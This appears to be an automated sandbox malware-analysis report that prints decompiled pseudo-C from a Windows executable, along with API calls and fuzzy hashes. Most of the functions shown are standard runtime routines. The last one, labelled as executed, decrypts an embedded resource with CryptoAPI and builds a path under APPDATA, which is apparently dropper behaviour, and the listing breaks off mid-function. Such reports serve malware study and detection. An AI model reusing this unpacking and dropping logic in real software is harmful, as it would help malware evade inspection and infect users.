        • Instruction Fuzzy Hash: F91170F2C01148AAD714EBA5C4C1EEE77689B05318F04D03FE955772C2E73C5905CB59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040A925(signed int _a4, void* _a8, long _a12) {
        				void _v5;
        				signed int _v12;
        				long _v16;
        				long _t74;
        				signed int _t77;
        				intOrPtr _t83;
        				signed char _t84;
        				signed char _t86;
        				long _t87;
        				void _t89;
        				signed char _t91;
        				char _t99;
        				long _t102;
        				void _t103;
        				intOrPtr* _t105;
        				void* _t106;
        				signed char* _t107;
        				long _t109;
        				signed int _t112;
        				signed char _t114;
        				long _t115;
        				void* _t116;
        				signed int _t118;
        				signed int _t120;
        				signed char* _t121;
        				void* _t122;
        				void* _t123;
        
        				_t118 = _a4;
        				_t123 = _t118 -  *0x410a40; // 0x20
        				if(_t123 >= 0) {
        					L44:
        					 *0x40efa8 =  *0x40efa8 & 0x00000000;
        					 *0x40efa4 = 9;
        					L45:
        					return _t74 | 0xffffffff;
        				}
        				_t77 = _t118 >> 5;
        				_t120 = (_t118 & 0x0000001f) << 3;
        				_t105 = 0x410940 + _t77 * 4;
        				_t74 =  *((intOrPtr*)(0x410940 + _t77 * 4)) + _t120;
        				_t114 =  *((intOrPtr*)(_t74 + 4));
        				if((_t114 & 0x00000001) == 0) {
        					goto L44;
        				}
        				_v12 = _v12 & 0x00000000;
        				_t116 = _a8;
        				_t106 = _t116;
        				if(_a12 == 0 || (_t114 & 0x00000002) != 0) {
        					L11:
        					return 0;
        				} else {
        					if((_t114 & 0x00000048) != 0) {
        						_t103 =  *((intOrPtr*)(_t74 + 5));
        						if(_t103 != 0xa) {
        							_a12 = _a12 - 1;
        							 *_t116 = _t103;
        							_t106 = _t116 + 1;
        							_v12 = 1;
        							 *((char*)( *_t105 + _t120 + 5)) = 0xa;
        						}
        					}
        					if(ReadFile( *( *_t105 + _t120), _t106, _a12,  &_v16, 0) != 0) {
        						_t83 =  *_t105;
        						_t115 = _v16;
        						_v12 = _v12 + _t115;
        						_t31 = _t120 + 4; // 0x4
        						_t107 = _t83 + _t31;
        						_t84 =  *((intOrPtr*)(_t83 + _t120 + 4));
        						if((_t84 & 0x00000080) == 0) {
        							L43:
        							return _v12;
        						}
        						if(_t115 == 0 ||  *_t116 != 0xa) {
        							_t86 = _t84 & 0x000000fb;
        						} else {
        							_t86 = _t84 | 0x00000004;
        						}
        						 *_t107 = _t86;
        						_t87 = _a8;
        						_a12 = _t87;
        						_t109 = _v12 + _t87;
        						_v12 = _t109;
        						if(_t87 >= _t109) {
        							L42:
        							_v12 = _t116 - _a8;
        							goto L43;
        						} else {
        							while(1) {
        								_t89 =  *_a12;
        								if(_t89 == 0x1a) {
        									break;
        								}
        								if(_t89 == 0xd) {
        									if(_a12 >= _t109 - 1) {
        										_a12 = _a12 + 1;
        										if(ReadFile( *( *_t105 + _t120),  &_v5, 1,  &_v16, 0) != 0 || GetLastError() == 0) {
        											if(_v16 == 0) {
        												goto L36;
        											}
        											if(( *( *_t105 + _t120 + 4) & 0x00000048) == 0) {
        												if(_t116 != _a8 || _v5 != 0xa) {
        													E0040A0DE(_a4, 0xffffffff, 1);
        													_t122 = _t122 + 0xc;
        													if(_v5 == 0xa) {
        														goto L38;
        													}
        													goto L36;
        												} else {
        													L34:
        													 *_t116 = 0xa;
        													goto L37;
        												}
        											}
        											_t99 = _v5;
        											if(_t99 == 0xa) {
        												goto L34;
        											}
        											 *_t116 = 0xd;
        											_t116 = _t116 + 1;
        											 *((char*)( *_t105 + _t120 + 5)) = _t99;
        											goto L38;
        										} else {
        											L36:
        											 *_t116 = 0xd;
        											L37:
        											_t116 = _t116 + 1;
        											L38:
        											_t109 = _v12;
        											if(_a12 < _t109) {
        												continue;
        											}
        											goto L42;
        										}
        									}
        									_t102 = _a12 + 1;
        									if( *_t102 != 0xa) {
        										 *_t116 = 0xd;
        										_t116 = _t116 + 1;
        										_a12 = _t102;
        										goto L38;
        									}
        									_a12 = _a12 + 2;
        									goto L34;
        								}
        								 *_t116 = _t89;
        								_t116 = _t116 + 1;
        								_a12 = _a12 + 1;
        								goto L38;
        							}
        							_t121 =  *_t105 + _t120 + 4;
        							_t91 =  *_t121;
        							if((_t91 & 0x00000040) == 0) {
        								 *_t121 = _t91 | 0x00000002;
        							}
        							goto L42;
        						}
        					}
        					_t74 = GetLastError();
        					_t112 = 5;
        					if(_t74 != _t112) {
        						if(_t74 != 0x6d) {
        							_t74 = E0040A8BE(_t74);
        							goto L45;
        						}
        						goto L11;
        					}
        					 *0x40efa4 = 9;
        					 *0x40efa8 = _t112;
        					goto L45;
        				}
        			}

        APIs
        • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040A9A9
        • GetLastError.KERNEL32(?,?), ref: 0040A9B3
        • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040AA7A
        • GetLastError.KERNEL32(?,?), ref: 0040AA84
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ErrorFileLastRead
        • String ID:
        • API String ID: 1948546556-0
        • Opcode ID: 3bcf9c374ecf940d791d04bface5097fc459326c3e5ec510815806064e1d019f
        • Instruction ID: 7d422fff0f27af7aa959a9ea3cedd1a765cd8bd906040cff84822314267a9bfe
        • Opcode Fuzzy Hash: 3bcf9c374ecf940d791d04bface5097fc459326c3e5ec510815806064e1d019f
        • Instruction Fuzzy Hash: 5461E470704385DFDB158F58C9447AA3BB0AB12304F1444BBE452AB3D2D3B89966DB1B
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00409C8D(long _a4, void* _a8, long _a12) {
        				intOrPtr* _v8;
        				long _v12;
        				long _v16;
        				intOrPtr _v20;
        				void _v1048;
        				signed char _t58;
        				void** _t64;
        				intOrPtr _t67;
        				char* _t72;
        				long _t79;
        				signed char* _t83;
        				signed int _t84;
        				char _t90;
        				struct _OVERLAPPED* _t94;
        				long _t96;
        				signed int _t99;
        				void* _t102;
        
        				_t84 = _a4;
        				_t102 = _t84 -  *0x410a40; // 0x20
        				if(_t102 >= 0) {
        					L30:
        					 *0x40efa8 =  *0x40efa8 & 0x00000000;
        					 *0x40efa4 = 9;
        					L31:
        					return _t58 | 0xffffffff;
        				}
        				_t83 = 0x410940 + (_t84 >> 5) * 4;
        				_t99 = (_t84 & 0x0000001f) << 3;
        				_t58 =  *((intOrPtr*)( *_t83 + _t99 + 4));
        				if((_t58 & 0x00000001) == 0) {
        					goto L30;
        				}
        				_t94 = 0;
        				_v12 = 0;
        				_v20 = 0;
        				if(_a12 != 0) {
        					if((_t58 & 0x00000020) != 0) {
        						E0040A0DE(_t84, 0, 2);
        					}
        					_t64 =  *_t83 + _t99;
        					if((_t64[1] & 0x00000080) == 0) {
        						if(WriteFile( *_t64, _a8, _a12,  &_v16, _t94) == 0) {
        							_a4 = GetLastError();
        						} else {
        							_a4 = _t94;
        							_v12 = _v16;
        						}
        						L17:
        						_t67 = _v12;
        						if(_t67 != _t94) {
        							return _t67 - _v20;
        						}
        						if(_a4 == _t94) {
        							L26:
        							_t58 =  *_t83;
        							if(( *(_t58 + _t99 + 4) & 0x00000040) == 0) {
        								L28:
        								 *0x40efa4 = 0x1c;
        								 *0x40efa8 = _t94;
        								goto L31;
        							}
        							_t58 = _a8;
        							if( *_t58 == 0x1a) {
        								goto L3;
        							}
        							goto L28;
        						}
        						_t58 = 5;
        						if(_a4 != _t58) {
        							_t58 = E0040A8BE(_a4);
        						} else {
        							 *0x40efa4 = 9;
        							 *0x40efa8 = _t58;
        						}
        						goto L31;
        					}
        					_v8 = _a8;
        					_a4 = _t94;
        					if(_a12 <= _t94) {
        						goto L26;
        					} else {
        						goto L8;
        					}
        					do {
        						L8:
        						_t72 =  &_v1048;
        						while(_v8 - _a8 < _a12) {
        							_v8 = _v8 + 1;
        							_t90 =  *_v8;
        							if(_t90 == 0xa) {
        								_v20 = _v20 + 1;
        								 *_t72 = 0xd;
        								_t72 = _t72 + 1;
        							}
        							 *_t72 = _t90;
        							_t72 = _t72 + 1;
        							if(_t72 -  &_v1048 < 0x400) {
        								continue;
        							} else {
        								break;
        							}
        						}
        						_t96 = _t72 -  &_v1048;
        						if(WriteFile( *( *_t83 + _t99),  &_v1048, _t96,  &_v16, 0) == 0) {
        							_a4 = GetLastError();
        							break;
        						}
        						_t79 = _v16;
        						_v12 = _v12 + _t79;
        					} while (_t79 >= _t96 && _v8 - _a8 < _a12);
        					_t94 = 0;
        					goto L17;
        				}
        				L3:
        				return 0;
        			}

        APIs
        • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 00409D65
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: aa650641004e27e9a5f368425580be188142e03bb9e637c8b463a0830571530e
        • Instruction ID: 063d55d0408538064a6ab3a90532cc0ca8c05583f3491d3b9c00d4756e0e5f0e
        • Opcode Fuzzy Hash: aa650641004e27e9a5f368425580be188142e03bb9e637c8b463a0830571530e
        • Instruction Fuzzy Hash: 3051C071900208EFDB11CF68C988AAE7BB0FF45350F24857AE919AB2D2D7748E40DB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E0040835F(short* _a4, char* _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
        				intOrPtr* _t29;
        				int _t30;
        				void* _t31;
        				int _t33;
        				signed short* _t34;
        				short* _t35;
        				intOrPtr _t37;
        				intOrPtr _t38;
        				int _t42;
        				signed char _t46;
        				char* _t49;
        				char* _t50;
        
        				_t49 = _a8;
        				if(_t49 == 0 || _a12 == 0) {
        					L5:
        					return 0;
        				} else {
        					_t46 =  *_t49;
        					if(_t46 != 0) {
        						_t29 = _a20;
        						if(_t29 != 0) {
        							_t38 =  *_t29;
        							_t30 =  *(_t29 + 4);
        						} else {
        							_t38 =  *0x40f224; // 0x0
        							_t30 =  *0x40f234; // 0x0
        						}
        						if(_t38 != 0) {
        							_t50 = _a16;
        							if( *_t50 == 0) {
        								_t37 =  *0x40e560; // 0x40e56a
        								if(( *(_t37 + 1 + (_t46 & 0x000000ff) * 2) & 0x00000080) == 0) {
        									_t30 = MultiByteToWideChar(_t30, 9, _t49, 1, _a4, 0 | _a4 != 0x00000000);
        									if(_t30 != 0) {
        										goto L13;
        									}
        									L21:
        									 *0x40efa4 = 0x2a;
        									return _t30 | 0xffffffff;
        								}
        								_t42 =  *0x40e76c; // 0x1
        								if(_a12 >= _t42) {
        									if(_t42 <= 1) {
        										L27:
        										if(_t49[1] != 0) {
        											L19:
        											_t33 =  *0x40e76c; // 0x1
        											return _t33;
        										}
        										 *_t50 =  *_t50 & 0x00000000;
        										goto L21;
        									}
        									_t30 = MultiByteToWideChar(_t30, 9, _t49, _t42, _a4, 0 | _a4 != 0x00000000);
        									if(_t30 != 0) {
        										goto L19;
        									}
        									goto L27;
        								}
        								 *_t50 = _t46;
        								_push(0xfffffffe);
        								goto L14;
        							}
        							_t50[1] = _t46;
        							if( *0x40e76c <= 1) {
        								L20:
        								 *_t50 = 0;
        								goto L21;
        							}
        							_t30 = MultiByteToWideChar(_t30, 9, _t50, 2, _a4, 0 | _a4 != 0x00000000);
        							if(_t30 == 0) {
        								goto L20;
        							}
        							 *_t50 = 0;
        							goto L19;
        						} else {
        							_t34 = _a4;
        							if(_t34 != 0) {
        								 *_t34 = _t46 & 0x000000ff;
        							}
        							L13:
        							_push(1);
        							L14:
        							_pop(_t31);
        							return _t31;
        						}
        					} else {
        						_t35 = _a4;
        						if(_t35 != 0) {
        							 *_t35 = 0;
        						}
        						goto L5;
        					}
        				}
        			}

        APIs
        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000), ref: 004083DF
        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 0040843A
        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 00408461
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ByteCharMultiWide
        • String ID: j@
        • API String ID: 626452242-1913250263
        • Opcode ID: 88dfc82478a13292b4adaf5fc1564b8ec97ffeb458ab3aa8f74fa1d8ba83448a
        • Instruction ID: 2e5c925f93106763c763493ff94fd1699266ff540c1958328e8edf38e98b5771
        • Opcode Fuzzy Hash: 88dfc82478a13292b4adaf5fc1564b8ec97ffeb458ab3aa8f74fa1d8ba83448a
        • Instruction Fuzzy Hash: 7631F570104306EFDB208F60DA84A6B3BA5EB81B00F14853EEDC5AA2D1DB769C80D799
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00405693(void* __ecx) {
        				int _t30;
        				void* _t40;
        				int _t42;
        				short* _t44;
        				int _t45;
        				int _t48;
        				void* _t49;
        				short* _t51;
        
        				_t40 = __ecx;
        				_t51 =  *(_t49 - 0x18);
        				 *(_t49 - 0x24) = 0;
        				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
        				_t45 =  *(_t49 + 0x14);
        				_t42 = 1;
        				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
        					L8:
        					_t30 = 0;
        				} else {
        					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
        					 *(_t49 - 0x20) = _t48;
        					if(_t48 == 0) {
        						goto L8;
        					} else {
        						 *(_t49 - 4) = _t42;
        						E00405450(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
        						 *(_t49 - 0x18) = _t51;
        						_t44 = _t51;
        						 *(_t49 - 0x28) = _t44;
        						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
        						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
        							goto L8;
        						} else {
        							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
        						}
        					}
        				}
        				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
        				return _t30;
        			}

        APIs
        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?,?,?,?,00403D23), ref: 004056C2
        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00403D23), ref: 004056D5
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00403D23), ref: 00405721
        • CompareStringW.KERNEL32(?,00000000,00000000,?,?,00000000,?,00000000,?,?,?,00403D23), ref: 00405739
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ByteCharMultiWide$CompareString
        • String ID:
        • API String ID: 376665442-0
        • Opcode ID: 58db1b16891f65eb51c1b7bb2f02adff7ae438159a16b459b0dcbe769e7157d7
        • Instruction ID: be65fde93fd66d36b2ad2bbc0943cc497e36727e0c8815195bc47ca2454b5735
        • Opcode Fuzzy Hash: 58db1b16891f65eb51c1b7bb2f02adff7ae438159a16b459b0dcbe769e7157d7
        • Instruction Fuzzy Hash: 9B210932900649EBCF219F94CC859DF7FB5FB48750F144226FA15721A0C3369961EF94
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E004045EE(void* __ebx, void* __edi) {
        				char _v17;
        				signed char _v18;
        				struct _cpinfo _v24;
        				char _v280;
        				char _v536;
        				char _v792;
        				char _v1304;
        				void* _t43;
        				char _t44;
        				signed char _t45;
        				void* _t55;
        				signed int _t56;
        				signed char _t64;
        				intOrPtr* _t66;
        				signed int _t68;
        				signed int _t70;
        				signed int _t71;
        				signed char _t76;
        				signed char _t77;
        				signed char* _t78;
        				void* _t81;
        				void* _t87;
        				void* _t88;
        
        				if(GetCPInfo( *0x4106e4,  &_v24) == 1) {
        					_t44 = 0;
        					do {
        						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
        						_t44 = _t44 + 1;
        					} while (_t44 < 0x100);
        					_t45 = _v18;
        					_v280 = 0x20;
        					if(_t45 == 0) {
        						L9:
        						E004051A0(1,  &_v280, 0x100,  &_v1304,  *0x4106e4,  *0x410904, 0);
        						E00404F51( *0x410904, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4106e4, 0);
        						E00404F51( *0x410904, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4106e4, 0);
        						_t55 = 0;
        						_t66 =  &_v1304;
        						do {
        							_t76 =  *_t66;
        							if((_t76 & 0x00000001) == 0) {
        								if((_t76 & 0x00000002) == 0) {
        									 *(_t55 + 0x410700) =  *(_t55 + 0x410700) & 0x00000000;
        									goto L16;
        								}
        								 *(_t55 + 0x410801) =  *(_t55 + 0x410801) | 0x00000020;
        								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
        								L12:
        								 *(_t55 + 0x410700) = _t77;
        								goto L16;
        							}
        							 *(_t55 + 0x410801) =  *(_t55 + 0x410801) | 0x00000010;
        							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
        							goto L12;
        							L16:
        							_t55 = _t55 + 1;
        							_t66 = _t66 + 2;
        						} while (_t55 < 0x100);
        						return _t55;
        					}
        					_t78 =  &_v17;
        					do {
        						_t68 =  *_t78 & 0x000000ff;
        						_t56 = _t45 & 0x000000ff;
        						if(_t56 <= _t68) {
        							_t81 = _t87 + _t56 - 0x114;
        							_t70 = _t68 - _t56 + 1;
        							_t71 = _t70 >> 2;
        							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
        							_t88 = _t88 + 0x18;
        						}
        						_t78 =  &(_t78[2]);
        						_t45 =  *((intOrPtr*)(_t78 - 1));
        					} while (_t45 != 0);
        					goto L9;
        				}
        				_t43 = 0;
        				do {
        					if(_t43 < 0x41 || _t43 > 0x5a) {
        						if(_t43 < 0x61 || _t43 > 0x7a) {
        							 *(_t43 + 0x410700) =  *(_t43 + 0x410700) & 0x00000000;
        						} else {
        							 *(_t43 + 0x410801) =  *(_t43 + 0x410801) | 0x00000020;
        							_t64 = _t43 - 0x20;
        							goto L22;
        						}
        					} else {
        						 *(_t43 + 0x410801) =  *(_t43 + 0x410801) | 0x00000010;
        						_t64 = _t43 + 0x20;
        						L22:
        						 *(_t43 + 0x410700) = _t64;
        					}
        					_t43 = _t43 + 1;
        				} while (_t43 < 0x100);
        				return _t43;
        			}

        APIs
        • GetCPInfo.KERNEL32(?,00000000), ref: 00404602
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: Info
        • String ID: $
        • API String ID: 1807457897-3032137957
        • Opcode ID: 4444aa8d7da064d58e8d0a1b204f47f3315b4c5e9ccd75e9d468bb3b92cdceba
        • Instruction ID: 1080f7578a907230f95c2f44c8e2f0c4d0db4fc4991231efd6f5e5fa4597ea85
        • Opcode Fuzzy Hash: 4444aa8d7da064d58e8d0a1b204f47f3315b4c5e9ccd75e9d468bb3b92cdceba
        • Instruction Fuzzy Hash: 7F417BB10042985EEB129764CE49BFB3F99DB83700F1404F6D749E71D2C7BA4984CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004053D3() {
        				char* _v4;
        				short* _t4;
        				char* _t6;
        				short** _t14;
        				int _t15;
        
        				_t14 =  *0x40efd4; // 0x0
        				_t4 =  *_t14;
        				if(_t4 == 0) {
        					L6:
        					return 0;
        				}
        				while(1) {
        					_t6 = WideCharToMultiByte(1, 0, _t4, 0xffffffff, 0, 0, 0, 0);
        					_t15 = _t6;
        					if(_t15 == 0) {
        						break;
        					}
        					_t6 = E00401F8B(_t15);
        					_v4 = _t6;
        					if(_t6 == 0) {
        						break;
        					}
        					_t6 = WideCharToMultiByte(1, 0,  *_t14, 0xffffffff, _t6, _t15, 0, 0);
        					if(_t6 == 0) {
        						break;
        					}
        					_t2 =  &_v4; // 0x403d23
        					E00405755( *_t2, 0);
        					_t4 = _t14[1];
        					_t14 =  &(_t14[1]);
        					if(_t4 != 0) {
        						continue;
        					}
        					goto L6;
        				}
        				return _t6 | 0xffffffff;
        			}

        APIs
        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,021E0E00,00000000,?,?,00404EF7,00000000,00401586), ref: 004053F6
        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00404EF7,00000000,00401586,?,00403D52,0040C49C,?), ref: 00405418
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp
        • Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp
        • Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp
        Similarity
        • API ID: ByteCharMultiWide
        • String ID: #=@y"@
        • API String ID: 626452242-2014422622
        • Opcode ID: ed89285eb5713ad0009ad110d74f044f72fdcb4154208462bb0c2d2f79b846b3
        • Instruction ID: e291d5219e47da3f92f3b56b7dc1f6f2a813dd76b424de1c8fee73efc1c74300
        • Opcode Fuzzy Hash: ed89285eb5713ad0009ad110d74f044f72fdcb4154208462bb0c2d2f79b846b3
        • Instruction Fuzzy Hash: F001D6312045417AD730565B9C84E6B7BACDBC2B31B24073FF524F21E2DA719C40C974
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        C-Code - Quality: 77%
        			E00401282() {
        				unsigned int _v8;
        				void* _v12;
        				struct HINSTANCE__* _v16;
        				void* _v20;
        				long* _v24;
        				char _v28;
        				char* _v32;
        				char* _v36;
        				int _v40;
        				unsigned int _v44;
        				void* _v48;
        				void* _v60;
        				struct tagMSG _v88;
        				void _v347;
        				char _v348;
        				void _v607;
        				char _v608;
        				void _v867;
        				char _v868;
        				void _v1127;
        				char _v1128;
        				void _v1387;
        				char _v1388;
        				void _v1647;
        				char _v1648;
        				struct HWND__* _t152;
        				long _t162;
        				void* _t163;
        				signed int _t166;
        				char* _t170;
        				int _t173;
        				int _t176;
        				int _t178;
        				void* _t179;
        				void* _t181;
        				intOrPtr _t186;
        				void* _t187;
        				void* _t203;
        				void* _t217;
        				struct HINSTANCE__* _t230;
        				struct HRSRC__* _t244;
        				intOrPtr* _t245;
        				signed int _t247;
        				signed int _t255;
        				signed int _t262;
        				signed int _t263;
        				signed int _t268;
        				signed int _t270;
        				signed int _t275;
        				unsigned int _t283;
        				struct HRSRC__* _t292;
        				void* _t293;
        				BYTE* _t306;
        				CHAR* _t317;
        				void* _t319;
        				void* _t323;
        				char* _t324;
        				void* _t326;
        				void* _t329;
        				void* _t331;
        				void* _t333;
        
        				_v868 = _v868 & 0x00000000;
        				_t247 = 0x40;
        				memset( &_v867, 0, _t247 << 2);
        				_v1128 = _v1128 & 0x00000000;
        				_push(0x40);
        				asm("stosw");
        				asm("stosb");
        				_v608 = _v608 & 0x00000000;
        				memset( &_v1127, 0, 0 << 2);
        				asm("stosw");
        				asm("stosb");
        				_push(0x40);
        				memset( &_v607, 0, 0 << 2);
        				_t329 = _t326 + 0x24;
        				asm("stosw");
        				asm("stosb");
        				GetModuleFileNameA(0,  &_v1128, 0x104);
        				GetEnvironmentVariableA("TEMP",  &_v868, 0x104);
        				GetEnvironmentVariableA("APPDATA",  &_v608, 0x104);
        				_v16 = 0;
        				do {
        					_t152 = GetDesktopWindow();
        					_v8 = _t152;
        					_v12 = 0;
        					while(PeekMessageA( &_v88, _t152, 0, 0, 1) != 0 && _v12 < 0xc350) {
        						if(_v44 != 0xffffffff) {
        							if(IsWindow(_v8) == 0 || IsDialogMessageA(_v8,  &_v88) == 0) {
        								TranslateMessage( &_v88);
        								DispatchMessageA( &_v88);
        							}
        						} else {
        							Sleep(0x64);
        						}
        						IsDlgButtonChecked(_v8, 7);
        						_t152 = GetDesktopWindow();
        						_v12 = _v12 + 1;
        						_v8 = _t152;
        					}
        					_t244 = FindResourceA(0, 1, 0x15);
        					_v12 = LoadResource(0, _t244);
        					_v8 = SizeofResource(0, _t244);
        					_t245 = LockResource(_v12);
        					if(_v8 <= 0) {
        						L41:
        						return 0;
        					}
        					_v16 =  &(_v16[1]);
        				} while (_v16 < 0xc350);
        				_t292 = FindResourceA(0, 1, 0x14);
        				_v12 = LoadResource(0, _t292);
        				_t162 = SizeofResource(0, _t292);
        				_v8 = _t162;
        				_t163 = _t162 + 0x64;
        				_push(_t163); // executed
        				L004024E8(); // executed
        				_t293 = _t163;
        				_v16 = _t293;
        				_t319 = LockResource(_v12);
        				_t255 = _v8 >> 2;
        				_t166 = memcpy(_t293, _t319, _t255 << 2);
        				_t44 = _t245 + 0xba; // 0xba
        				_t170 = memcpy(_t319 + _t255 + _t255, _t319, _t166 & 0x00000003);
        				_t331 = _t329 + 0x18;
        				PathCombineA(_t170,  &_v608, _t44); // executed
        				_t173 = PathFileExistsA( &_v608); // executed
        				_v12 = _t173;
        				_t174 =  *((intOrPtr*)(_t245 + 4));
        				_v36 = 0;
        				if( *((intOrPtr*)(_t245 + 4)) != 0) {
        					_v36 = E00401FB0( &_v868, _t174,  &_v868);
        				}
        				_v32 = 0;
        				_v28 = 0;
        				_v24 = 0;
        				_t176 = CryptAcquireContextA( &_v24, 0, "Microsoft Base Cryptographic Provider v1.0", 1, 0); // executed
        				if(_t176 == 0) {
        					CryptAcquireContextA( &_v24, 0, "Microsoft Base Cryptographic Provider v1.0", 1, 8); // executed
        				}
        				__imp__CryptCreateHash(_v24, 0x8003, 0, 0,  &_v28);
        				_t178 = _v8;
        				_v40 = _t178;
        				_t179 = _t178 + 0x64;
        				L004024E8(); // executed
        				_v20 = _t179;
        				L004024E8();
        				asm("movsd");
        				asm("movsd");
        				asm("movsw");
        				asm("movsb");
        				asm("movsd");
        				asm("movsd");
        				asm("movsw");
        				_t262 = _v40;
        				_t323 = _v16;
        				_t263 = _t262 >> 2;
        				memcpy(_v20, _t323, _t263 << 2);
        				_t181 = memcpy(_t323 + _t263 + _t263, _t323, _t262 & 0x00000003);
        				_t333 = _t331 + 0x18;
        				_t324 = 0;
        				__imp__CryptHashData(_v28, _t181, 0xa, 0, "true", _t179);
        				__imp__CryptDeriveKey(_v24, 0x6801, _v28, 0,  &_v32); // executed
        				_t306 = _v20;
        				CryptDecrypt(_v32, 0, 1, 0, _t306,  &_v40);
        				_t185 =  *_t245;
        				_v16 = _t306;
        				if( *_t245 != 0) {
        					_t230 = E00401000(_t185, 0, _t306, _v8, _t185);
        					_t333 = _t333 + 0xc;
        					_v16 = _t230;
        				}
        				_t186 =  *((intOrPtr*)(_t245 + 0x18));
        				if(_t186 <= _t324 || _v12 != _t324) {
        					if(_t186 != 1) {
        						goto L23;
        					}
        					goto L21;
        				} else {
        					L21:
        					_t81 = _t245 + 0x20; // 0x20
        					_t317 = _t81;
        					do {
        						_t83 = _t245 + 0x52; // 0x52
        					} while (MessageBoxA(_t324, _t83, _t317,  *(_t245 + 0x1c)) == 4);
        					L23:
        					_t187 =  *(_t245 + 0xc);
        					if(_t187 <= _t324 || _v12 != _t324) {
        						if(_t187 != 1) {
        							goto L31;
        						}
        						goto L26;
        					} else {
        						L26:
        						_push(0x70);
        						L004024E8();
        						_t283 =  *((intOrPtr*)(_t245 + 0x10)) + _v16;
        						_v48 = _t187;
        						_v20 = _t324;
        						_v44 = _t283;
        						if( *((intOrPtr*)(_t245 + 0x14)) <= _t324) {
        							L31:
